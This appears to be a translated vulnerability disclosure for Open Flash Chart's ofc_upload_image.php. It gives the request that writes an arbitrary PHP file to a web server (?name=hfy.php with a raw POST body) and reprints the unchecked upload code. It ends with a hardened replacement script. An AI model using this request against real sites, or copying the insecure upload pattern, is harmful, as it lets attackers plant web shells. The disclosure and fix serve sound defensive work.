Arbitrary-extension file write via POST data in a vulnerable file
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php    (hfy.php is the file name)

POST arbitrary data as the request body.
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is present in the latest version of wss, even in the paid edition; the demo deployed on the Sina store has it too.

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);
// full path to the saved image including filename //
// NOTE: only basename() is applied to the client-supplied name; the extension
// is never checked, so ?name=hfy.php is accepted as-is.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// NOTE: the raw request body is written unchanged, with no authentication
// and no check that it is actually an image.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
Fix:
This vulnerable file is a tragedy. How to fix it: add permission checks, extension validation and the like. Do it yourself.
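One way to apply the fix suggested above, as an added example that is not Open Flash Chart's own code: a replacement for ofc_upload_image.php that requires an authenticated session, accepts only a .png file name from a character allowlist, checks that the body really is a PNG, reads the body via php://input (since $HTTP_RAW_POST_DATA no longer exists in PHP 7), and does not create the upload directory world-writable. The session flag name (ofc_can_upload) and the upload directory path are assumptions made for this example.

```php
<?php
// Hardened replacement for ofc_upload_image.php (example code, not the project's own).
// Assumptions: the chart page sets $_SESSION['ofc_can_upload'] for users allowed to
// save images, and OFC_UPLOAD_DIR is the directory the chart viewer reads from.
declare(strict_types=1);
session_start();

const OFC_SESSION_FLAG = 'ofc_can_upload';                 // assumed flag name
const OFC_UPLOAD_DIR   = __DIR__ . '/../tmp-upload-images/'; // assumed location
const OFC_MAX_BYTES    = 2 * 1024 * 1024;

/**
 * Validate the requested file name and the raw body, then write the PNG.
 * Returns [bool $ok, string $message, ?string $path].
 */
function save_chart_image(string $requestedName, string $rawBody, string $uploadDir): array
{
    // 1. Never trust the client's path: strip directories, then require a short
    //    alphanumeric name with a .png extension (the only thing OFC uploads).
    $name = basename($requestedName);
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.png\z/', $name)) {
        return [false, 'invalid file name', null];
    }

    // 2. Size limit before doing anything with the body.
    $len = strlen($rawBody);
    if ($len === 0 || $len > OFC_MAX_BYTES) {
        return [false, 'body empty or too large', null];
    }

    // 3. Content check: PNG signature, and the image parser agrees it is a PNG.
    if (substr($rawBody, 0, 8) !== "\x89PNG\r\n\x1a\n") {
        return [false, 'not a PNG file', null];
    }
    $info = @getimagesizefromstring($rawBody);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        return [false, 'not a PNG file', null];
    }

    // 4. Create the directory with a restrictive mode instead of 0777.
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0750, true)) {
        return [false, 'upload directory unavailable', null];
    }

    // 5. Write to a temp file in the same directory, then rename into place, so a
    //    partially written file is never visible under the final name.
    $final = $uploadDir . $name;
    $tmp   = $uploadDir . '.' . bin2hex(random_bytes(8)) . '.part';
    if (file_put_contents($tmp, $rawBody, LOCK_EX) !== $len) {
        @unlink($tmp);
        return [false, 'write failed', null];
    }
    chmod($tmp, 0640);
    if (!rename($tmp, $final)) {
        @unlink($tmp);
        return [false, 'write failed', null];
    }
    return [true, 'saved', $final];
}

// ---- request handling -----------------------------------------------------

// Authorisation check that the original file lacked.
if (empty($_SESSION[OFC_SESSION_FLAG])) {
    http_response_code(403);
    exit('forbidden');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('method not allowed');
}

// $HTTP_RAW_POST_DATA was removed in PHP 7; php://input is the supported way
// to read the raw body. Read one byte past the limit so oversize bodies are rejected.
$raw = file_get_contents('php://input', false, null, 0, OFC_MAX_BYTES + 1);

[$ok, $msg, $path] = save_chart_image($_GET['name'] ?? '', $raw === false ? '' : $raw, OFC_UPLOAD_DIR);
header('Content-Type: text/plain; charset=utf-8');
if (!$ok) {
    http_response_code(400);
    exit($msg);
}
// Report only the file name, not the server-side path the original echoed back.
echo 'saved: ' . basename($path);
```

The extension check alone would stop the ?name=hfy.php case from the post, but the content check and the session requirement are what keep the endpoint from being a general file-drop for anyone who can reach the URL; the restrictive directory mode also removes the 0777 the original creates.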